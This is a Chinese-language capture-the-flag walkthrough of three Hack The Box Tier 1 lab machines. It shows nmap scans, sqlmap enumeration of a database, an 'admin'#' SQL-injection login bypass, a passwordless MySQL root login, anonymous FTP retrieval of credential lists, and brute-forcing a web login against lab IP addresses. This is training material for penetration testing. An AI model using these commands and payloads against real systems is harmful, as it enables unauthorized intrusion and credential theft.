本文我們接著前期文章來學習hackthebox相關的靶場關卡。
TIER0我們在直播過程中已經(jīng)為大家進行了講解,本文單獨講解 TIER1的關卡吧。
 Appointment這關考察的是sql注入相關方面的知識,我們首先對其進行端口掃描。 nmap -T4 -A 10.129.23.47
如上,我們可以到了只起開了80端口,毫無疑問應該是個web站長。訪問IP如下。
既然是存在sql注入,我們在burp中進行抓包,將數(shù)據(jù)放到sqlmap中進行掃描即可。
將數(shù)據(jù)包保存為txt文件,然后執(zhí)行下面命令。
sqlmap -r '22.txt' --dbs
如下,成功得到數(shù)據(jù)庫信息。 表信息
sqlmap -r '22.txt' -D appdb --tables
表字段
sqlmap -r '22.txt' -D appdb -T users --columns
 當然,除了sqlmap跑之外還有更簡單的方法,我們利用萬能賬號直接登錄就行了。如admin'#  Sequle同樣,我們還是選對設備進行端口掃描。 nmap -sC -sV 10.129.95.232
我們可以看到,目標開啟了3306mysql端口。 對于既然目標來氣了mysql相關端口,我們可以嘗試暴力破解或者匿名登錄。執(zhí)行下面命令
mysql -h 10.129.95.232 -u root -p
回車后,發(fā)現(xiàn)可以直接登錄。 show databases; #顯示數(shù)據(jù)庫 use htb; #選擇數(shù)據(jù)庫 show tables; #顯示表 select * from config; #查詢表
如下,成功得到flag  Crocodile同樣,啟動靶場后我們對目標進行端口掃描。 nmap -sC -sV 10.129.104.219
如下,目標開啟了21 80端口。并且21端口可以匿名登錄。我們首先登錄ftp來看看。
下載文件
get allowed.userlist # 用戶列表 get allowed.userlist.passwd # 密碼列表
打開兩個文件,疑似存放了賬號和密碼。我們訪問80端口。 利用后臺掃描工具掃描站點后臺地址
dirb http://10.129.104.219 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -X .php
用下載后的賬號和密碼進行登錄,這里我用burp抓包后,進行枚舉破解。
成功得到flag
|